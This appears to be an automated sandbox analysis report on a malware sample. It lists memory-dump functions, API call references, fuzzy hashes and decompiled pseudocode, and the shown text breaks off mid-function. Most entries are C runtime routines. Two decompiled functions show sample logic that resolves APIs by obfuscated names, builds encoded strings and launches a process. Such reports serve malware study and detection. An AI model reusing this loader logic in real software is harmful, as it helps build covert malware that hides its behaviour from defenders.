Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA15
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA27
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA39
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA4B
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA5D
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA6F
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA81
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CA93
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAA5
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAB7
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAC9
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CADB
Part of subcall function 6ED4C9F8: _free.LIBCMT ref: 6ED4CAED

_free.LIBCMT ref: 6ED4B2DD

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4B2FF
_free.LIBCMT ref: 6ED4B314
_free.LIBCMT ref: 6ED4B31F
_free.LIBCMT ref: 6ED4B341
_free.LIBCMT ref: 6ED4B354
_free.LIBCMT ref: 6ED4B362
_free.LIBCMT ref: 6ED4B36D
_free.LIBCMT ref: 6ED4B3A5
_free.LIBCMT ref: 6ED4B3AC
_free.LIBCMT ref: 6ED4B3C9
_free.LIBCMT ref: 6ED4B3E1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 48c018023a6f9e488b06c3d06272e271d118736519cc4b537de5d21d40eae83b
Instruction ID: fb449d364f994ee9a53caee5282c50d86c3538d51b819710a0a0a3e99b9f5c25
Opcode Fuzzy Hash: 48c018023a6f9e488b06c3d06272e271d118736519cc4b537de5d21d40eae83b
Instruction Fuzzy Hash: C7312732605609EFEB519BFAD848BDE73E8EF30354F548829E059D6199DF34E894CB20

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15688
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15692
int.LIBCPMT ref: 6ED156A9

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED156E3
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15703
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15710
__EH_prolog3.LIBCMT ref: 6ED1571D

Strings

T=n, xrefs: 6ED1569D

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: T=n
API String ID: 3920336645-3289637788
Opcode ID: ce5fb297b8bd7435ca25c8363d263b2adc11739a1bae758ef317e1649f1646e6
Instruction ID: f9c1ce157a5584ce30ac5b83b104f1363f33cc8f45872b34334d62e434040868
Opcode Fuzzy Hash: ce5fb297b8bd7435ca25c8363d263b2adc11739a1bae758ef317e1649f1646e6
Instruction Fuzzy Hash: 0721D575904659DFCF02CFE4D9446EDBBB9BF45728F144909E8106B390CB74DA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED07D9F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED07DA6
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07DB0
int.LIBCPMT ref: 6ED07DC7

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07E01
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07E21
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07E2E
__EH_prolog3.LIBCMT ref: 6ED07E3B

Strings

x<n, xrefs: 6ED07DBB

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: x<n
API String ID: 3920336645-2300383073
Opcode ID: c2444aafcc72f13da33ca26d571cd9f6ca1656aa3b6d7ecaf9fce721390f4f69
Instruction ID: 60792485e55a5944d2c5cfa9a4ecbe1769c71c9377cdd24b84dcb269d86a544a
Opcode Fuzzy Hash: c2444aafcc72f13da33ca26d571cd9f6ca1656aa3b6d7ecaf9fce721390f4f69
Instruction Fuzzy Hash: 7221A17590461AEBCF01DFE4D945AED7BB9AF45718F28490AE8106B380DB70DE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED154C2, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED154C9
std::_Lockit::_Lockit.LIBCPMT ref: 6ED154D3
int.LIBCPMT ref: 6ED154EA

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED1550D
std::_Facet_Register.LIBCPMT ref: 6ED15524
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15544
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15551

Strings

L=n, xrefs: 6ED154DE

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID: L=n
API String ID: 3376033448-731276138
Opcode ID: 8ef512022b8cbb9884f409dc22c00a56bc23262b056973ee1a740e8669bf924a
Instruction ID: 28a70b065971a296d7c4d6990be804d26a99e4485d0523038289077373051a7b
Opcode Fuzzy Hash: 8ef512022b8cbb9884f409dc22c00a56bc23262b056973ee1a740e8669bf924a
Instruction Fuzzy Hash: 1B01C03190451A9BCF05CFE4D944AEDB77AAF45328F240909D8216B3C0DF74DA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15557, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1555E
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15568
int.LIBCPMT ref: 6ED1557F

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED155A2
std::_Facet_Register.LIBCPMT ref: 6ED155B9
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED155D9
Concurrency::cancel_current_task.LIBCPMT ref: 6ED155E6

Strings

H=n, xrefs: 6ED15573

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID: H=n
API String ID: 3376033448-2953257340
Opcode ID: 2a92ad4031bb6218faf15d1d1f56b2562d09bf8d654782269554ea7148e1d1f3
Instruction ID: f3e059fd09275601f2a62ba274fd18167de46e066b95998961eb719d334e6e4b
Opcode Fuzzy Hash: 2a92ad4031bb6218faf15d1d1f56b2562d09bf8d654782269554ea7148e1d1f3
Instruction Fuzzy Hash: 4201C43190451ADBDF05CFE4D944AED777AAF85368F240909E4106B3C0DF78DA46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1526E, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15275
std::_Lockit::_Lockit.LIBCPMT ref: 6ED1527F
int.LIBCPMT ref: 6ED15296

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED152B9
std::_Facet_Register.LIBCPMT ref: 6ED152D0
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED152F0
Concurrency::cancel_current_task.LIBCPMT ref: 6ED152FD

Strings

8=n, xrefs: 6ED1528A

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID: 8=n
API String ID: 1767075461-3139775677
Opcode ID: 516a3e9c1a5f0cea5a273f40fae012f0a9a769a7b3888efed5dff18ecc4be58a
Instruction ID: 87d2a9a5f510a1a2903c98ce72ff372acaf4d380ff588a4eaff86b0ebd650671
Opcode Fuzzy Hash: 516a3e9c1a5f0cea5a273f40fae012f0a9a769a7b3888efed5dff18ecc4be58a
Instruction Fuzzy Hash: B101AD3290461A9BCF058FE4D944AED7779AF81328F240909D4106B290DB749E458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15303, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1530A
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15314
int.LIBCPMT ref: 6ED1532B

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED1534E
std::_Facet_Register.LIBCPMT ref: 6ED15365
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15385
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15392

Strings

<=n, xrefs: 6ED1531F

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID: <=n
API String ID: 958335874-548695723
Opcode ID: 6a42b7be983d762291a73cb373593b8f769801f9ae08d8c01eeb6e72fe160c35
Instruction ID: 2143471d752e44768826406de27df64485554bf752ee1eb279a523be11f6ab5c
Opcode Fuzzy Hash: 6a42b7be983d762291a73cb373593b8f769801f9ae08d8c01eeb6e72fe160c35
Instruction Fuzzy Hash: B601C03190451A9FCF05DFE4D954AEDB779AF85318F184D09E4106B2D0DFB4DE058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B5F64, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E012B5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x12bd37c; // 0x5249818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E012B3A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x12bc1ac;
				}
				_t46 = E012B51DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E012B75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x12bd2e0; // 0x3f8a5a8
						_t16 = _t75 + 0x12beb10; // 0x530025
						 *0x12bd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E012B3A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x12bc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E012B75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E012B4AAB(_v20);
						} else {
							_t66 =  *0x12bd2e0; // 0x3f8a5a8
							_t31 = _t66 + 0x12bec30; // 0x73006d
							 *0x12bd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E012B4AAB(_v12);
				}
				return _v24;
			}

0x012b5f6c
0x012b5f72
0x012b5f79
0x012b5f7f
0x012b5f83
0x012b5f87
0x012b5f8a
0x012b5f8f
0x012b5f94
0x012b5f96
0x012b5f96
0x012b5f9f
0x012b5fa4
0x012b5fa9
0x012b5faf
0x012b5fb9
0x012b5fc2
0x012b5fc9
0x012b5fe2
0x012b5fe7
0x012b5fec
0x012b5ff5
0x012b5ffe
0x012b600f
0x012b6018
0x012b601c
0x012b6020
0x012b6025
0x012b602a
0x012b602c
0x012b602c
0x012b6036
0x012b603f
0x012b6046
0x012b605e
0x012b6062
0x012b609f
0x012b6064
0x012b6067
0x012b606f
0x012b6080
0x012b608c
0x012b6094
0x012b6098
0x012b6098
0x012b6062
0x012b60a7
0x012b60ac
0x012b60b3

APIs

GetTickCount.KERNEL32 ref: 012B5F79
lstrlen.KERNEL32(?,80000002,00000005), ref: 012B5FB9
lstrlen.KERNEL32(00000000), ref: 012B5FC2
lstrlen.KERNEL32(00000000), ref: 012B5FC9
lstrlenW.KERNEL32(80000002), ref: 012B5FD6
lstrlen.KERNEL32(?,00000004), ref: 012B6036
lstrlen.KERNEL32(?), ref: 012B603F
lstrlen.KERNEL32(?), ref: 012B6046
lstrlenW.KERNEL32(?), ref: 012B604D

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: e1fb7765f9b4ac669f9ff0458395ac594308f4ab7000f8625a6029659e2765ed
Instruction ID: b5c5b2c24e96ba3f7187f7b4c86412de01600ddd51425d2425ee1ca511e17012
Opcode Fuzzy Hash: e1fb7765f9b4ac669f9ff0458395ac594308f4ab7000f8625a6029659e2765ed
Instruction Fuzzy Hash: D5416A7291020AEBCF21AFA8DC889EE7BB5FF44394F154455EE00A7251D736DA21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1542D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15434
std::_Lockit::_Lockit.LIBCPMT ref: 6ED1543E
int.LIBCPMT ref: 6ED15455

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED1548F
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED154AF
Concurrency::cancel_current_task.LIBCPMT ref: 6ED154BC

Strings

D=n, xrefs: 6ED15449

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: D=n
API String ID: 55977855-3351634183
Opcode ID: a28b420d03dd5b91eae453f3806b74c829b372e4db9b7a49ba52251e52026200
Instruction ID: 240735abb23dc81e08905c02995ccc89b211b87c94a3e76cca6aa320855b4ea3
Opcode Fuzzy Hash: a28b420d03dd5b91eae453f3806b74c829b372e4db9b7a49ba52251e52026200
Instruction Fuzzy Hash: 0401C03190461A9FCF05DFE4D944AEDB77AAF41328F240809E4116B3D0DF749A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED155EC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED155F3
std::_Lockit::_Lockit.LIBCPMT ref: 6ED155FD
int.LIBCPMT ref: 6ED15614

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED1564E
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED1566E
Concurrency::cancel_current_task.LIBCPMT ref: 6ED1567B

Strings

P=n, xrefs: 6ED15608

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: P=n
API String ID: 55977855-1602396554
Opcode ID: e22716aabd8bc611ea27c767274b8c2afccb305f4b8c1f06461ce45d71f751e4
Instruction ID: 8d2b017439ffe58535f0887ced79c2f43a7296cbea9e658214657b1d7f88d4c4
Opcode Fuzzy Hash: e22716aabd8bc611ea27c767274b8c2afccb305f4b8c1f06461ce45d71f751e4
Instruction Fuzzy Hash: F401C03190491ADFCF05CFE0D944AED777AAF41368F180909D4106B3D0DF749A068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1539F
std::_Lockit::_Lockit.LIBCPMT ref: 6ED153A9
int.LIBCPMT ref: 6ED153C0

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED153FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED1541A
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15427

Strings

@=n, xrefs: 6ED153B4

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: @=n
API String ID: 55977855-1549050641
Opcode ID: e1b615704b0336cb170d46ec65372a7a9853c8e494553b4534f9210b24474412
Instruction ID: 7c73be29ac92753f556bee69a2bc5f95e765f8a5487e31da3f8291ef812ad305
Opcode Fuzzy Hash: e1b615704b0336cb170d46ec65372a7a9853c8e494553b4534f9210b24474412
Instruction Fuzzy Hash: B901807191861A9FCF05DFE4E984AED7779AF45728F240909E4106B2C0DF749E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED078F7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED078FE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07908
int.LIBCPMT ref: 6ED0791F

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07959
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07979
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07986

Strings

|<n, xrefs: 6ED07913

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: |<n
API String ID: 55977855-311184759
Opcode ID: ec0624f2d0bac7e90f9d35da7ddfc7b58e218d88de4ca26aec3e4bcc75d8ae7c
Instruction ID: c41a5e561f56da07b0efe2c9f0259949159299f0566853ed8db0a85df95fcd99
Opcode Fuzzy Hash: ec0624f2d0bac7e90f9d35da7ddfc7b58e218d88de4ca26aec3e4bcc75d8ae7c
Instruction Fuzzy Hash: 6A01C47190051AABCF05DFE0D944AEDB779AF45318F180809D4106B2C0DF70D905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

_free.LIBCMT ref: 6ED432BF
_free.LIBCMT ref: 6ED432D8
_free.LIBCMT ref: 6ED43316
_free.LIBCMT ref: 6ED4331F
_free.LIBCMT ref: 6ED4332B

Strings

C, xrefs: 6ED4310E

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 519d7c45c24e8aea07fb8c5f50dd16d624f07e1930c77739badfe0cdd107a996
Instruction ID: bc43bbcb15d43dca5e1937ac44c5fae7fc2356435803a898b23728e0c0e99129
Opcode Fuzzy Hash: 519d7c45c24e8aea07fb8c5f50dd16d624f07e1930c77739badfe0cdd107a996
Instruction Fuzzy Hash: D2C16975A0121ADFDB64CFA8C898A9DB7B4FF19704F1045EAE849A7394D731AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 012B1000, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E012B1000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E012B4837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E012BA938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x12bd298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x12bd2e0; // 0x3f8a5a8
					_t18 = _t47 + 0x12be3b3; // 0x73797325
					_t68 = E012B2291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x12bd2e0; // 0x3f8a5a8
						_t19 = _t50 + 0x12be760; // 0x5248d08
						_t20 = _t50 + 0x12be0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E012B34C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E012B34C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x12bd270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E012B4AAB(_t70);
				goto L12;
			}

0x012b1008
0x012b1008
0x012b1017
0x012b101e
0x012b1023
0x012b1130
0x012b1137
0x012b1137
0x012b1032
0x012b103a
0x012b103d
0x012b1042
0x012b1057
0x012b105d
0x012b105e
0x012b1061
0x012b1067
0x012b106a
0x012b106f
0x012b1077
0x012b1083
0x012b1087
0x012b1117
0x012b108d
0x012b108d
0x012b1092
0x012b1099
0x012b10ad
0x012b10b1
0x012b1100
0x012b10b3
0x012b10b4
0x012b10bb
0x012b10d4
0x012b10d6
0x012b10da
0x012b10e1
0x012b10fb
0x012b10e3
0x012b10ec
0x012b10f1
0x012b10f1
0x012b10e1
0x012b110f
0x012b110f
0x012b1087
0x012b111e
0x012b1127
0x012b112b
0x00000000

APIs

Part of subcall function 012B4837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,012B101C,?,00000001,?,?,00000000,00000000), ref: 012B485C
Part of subcall function 012B4837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 012B487E
Part of subcall function 012B4837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 012B4894
Part of subcall function 012B4837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 012B48AA
Part of subcall function 012B4837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 012B48C0
Part of subcall function 012B4837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 012B48D6

memset.NTDLL ref: 012B106A

Part of subcall function 012B2291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,012B1083,73797325), ref: 012B22A2
Part of subcall function 012B2291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 012B22BC

GetModuleHandleA.KERNEL32(4E52454B,05248D08,73797325), ref: 012B10A0
GetProcAddress.KERNEL32(00000000), ref: 012B10A7
HeapFree.KERNEL32(00000000,00000000), ref: 012B110F

Part of subcall function 012B34C7: GetProcAddress.KERNEL32(36776F57,012B5B13), ref: 012B34E2

CloseHandle.KERNEL32(00000000,00000001), ref: 012B10EC
CloseHandle.KERNEL32(?), ref: 012B10F1
GetLastError.KERNEL32(00000001), ref: 012B10F5

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: fad2534f0348a5e79a23ee72ddea161dfdccdb33e59db431b81c0e902fb1daad
Instruction ID: 3afd6fc6a03d8894ce57ab4f167eaf492150dd83655722807f3d558648ba461d
Opcode Fuzzy Hash: fad2534f0348a5e79a23ee72ddea161dfdccdb33e59db431b81c0e902fb1daad
Instruction Fuzzy Hash: 703152B6910259BFDB21EFE4ECC9DEEBBBCEB04384F104465E606A7111D634AE54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B1974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E012B1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x12bd2e0; // 0x3f8a5a8
				_t1 = _t9 + 0x12be62c; // 0x253d7325
				_t36 = 0;
